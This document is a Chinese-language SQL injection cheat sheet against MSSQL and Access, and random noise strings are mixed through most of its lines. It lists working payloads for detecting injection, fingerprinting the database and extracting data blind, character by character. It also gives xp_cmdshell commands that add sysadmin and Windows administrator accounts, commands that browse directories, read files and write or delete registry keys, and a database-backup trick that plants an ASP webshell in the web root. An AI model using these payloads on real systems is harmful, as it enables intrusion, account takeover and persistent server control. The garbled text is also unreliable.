1.判断是否有注入;and 1=1 ;and 1=2 y~ZYI]`
J
2.初步判断是否是mssql ;and user>0 -%g&O-i\
S~+er{,ht4
3.注入参数是字符'and [查询条件] and ''=' |_ u
BA
9c-Ay
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ?-HLP%C('
$QB~ x{v@n
5.判断数据库系统
`[=3_
+YA,HhX9
;and (select count(*) from sysobjects)>0 mssql zP(UaSXz/
d2!A32m
;and (select count(*) from msysobjects)>0 access v.~uJ.T
j$u=7Z&E
[G=+f6 a
^jiYcg@_[
6.猜数据库 ;and (select Count(*) from [数据库名])>0 <8[y2|UBt
$ZEwz;HNo
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 rCTH 5"
l)^sE)
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 6|O2i j-J
U/|;u;H=
9.(1)猜字段的ascii值(access) i4XE26B;e
4EZl
(v"f`
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 %9qG|A,cA
},;ymk|g[
(2)猜字段的ascii值(mssql) J_H=GHMp}
e~+VN4D&b>
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
8FmRD
AzmISm
10.测试权限结构(mssql) 9:\YEs"
PU\?eA
:qQpBr$
hj_%'kk-A
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- y`n'>F11
x2M'!VK>n1
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- d;-/F b{4
7 z#Xf
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ofu
{g
n:#gKR-J
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Q#2gjR r
;<9 dND
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ~}g"Fe
hA0g'X2eC
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- g+xA0qW
"")I1iO
g
;and 1=(select IS_MEMBER('db_owner'));-- bhq s%B!:
"{&?t}rj+
j=C o
NdlJdq
11.添加mssql和系统的帐户 F*bmV>Qq
s?JNc4q
;exec master.dbo.sp_addlogin username;-- n.a55uy
;exec master.dbo.sp_password null,username,password;-- jQgy=;?Lwm
iO 9fg
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- fF"\$Ny
<A_L Zi
;exec master.dbo.xp_cmdshell 'net user username password $<~o,e-4
oOU?6nq
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- fF\s5f#:
)U~,q>H+
%
;exec master.dbo.xp_cmdshell 'net user username password /add';-- %~`y82r6
>C1**GQ
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- zh<[/'l
eVVm"96Q.;
xXJl Qbs
PZDj)x_%B&
12.(1)遍历目录 *&m{)cTs
'|9fDzW"]
;create table dirs(paths varchar(100), id int) rerl-T<3
(q@DBb4
;insert dirs exec master.dbo.xp_dirtree 'c:\' )G
a%Eg9
_Kw<4$0<p
;and (select top 1 paths from dirs)>0 B}(+\Q$I
[YsN c
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 2[ #7YWs
(eOzntp8
,Qd;t
2GHmA_7P
(2)遍历目录 '}Tf9L%
POl[]ni=>
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- $Eo)i
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 !D_Qat
C|@6rr9TA
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 "8'aZ.P
|BO!q9633V
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ]4$t'wI.
905%5\Y
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 R43yr+p
K_fQFuj+
#K5)Rb-H
}=+J&cR
13.mssql中的存储过程 ?3x7_=4t@
"-pQL )f
xp_regenumvalues 注册表根键, 子键 }AZ0BI,TI
aMxg6\8
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Q1?0R<jOU
k4:e0Wd
xp_regread 根键,子键,键值名 zB8 @Wl
h7}D//~p
;exec xp_regread aBH!K
x/UmpJD+
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ?D6?W6@
c%5G3j
xp_regwrite 根键,子键, 值名, 值类型, 值 &Ow[
.??[qBOTE
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 KKPQ[3g
Y6>@zznk
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 #LGAvFA*_F
fO;#;p.
xp_regdeletevalue 根键,子键,值名 q13bV
fG+/p 0sJ?
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 |Sne\N>%
-*Voui
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 SnK#YQCDt
C6$F.v
aCq ) hR
vy
<(1\
14.mssql的backup创建webshell <3[,bTIk
i#uc
use model ?!h
jI;_&
aSKLSl't`
create table cmd(str image); s$V'|Pt
}67lL~L
insert into cmd(str) values (''); 0 e}N{,&Y
l(o#N'!j4
backup database model to disk='c:\l.asp'; 7)2Co[t
_I"T(2Au
n#{z"G
Qx
B0I/
{
15.mssql内置函数 |wnXBKV(
xJQ-k/`
;and (select @@version)>0 获得Windows的版本号 &2~c,] 9C
5#DtaVz
;and user_name()='dbo' 判断当前系统的连接用户是不是sa w?r
D4@'C4kL
;and (select user_name())>0 爆当前系统的连接用户 &!@7+'])
J6WyFtlyLc
;and (select db_name())>0 得到当前连接的数据库 ^7qqO%
cZd9A(1"^
@w8MOT$
)L)jvCw,e
16.简洁的webshell W^es"\
5uVSbo.
use model 7K 8tz}
"sM
3NY
create table cmd(str image); *J ]2"~_.
Ju0W
insert into cmd(str) values (''); F8c^M</
=B+^-2G8
backup database model to disk='g:\wwwtest\l.asp';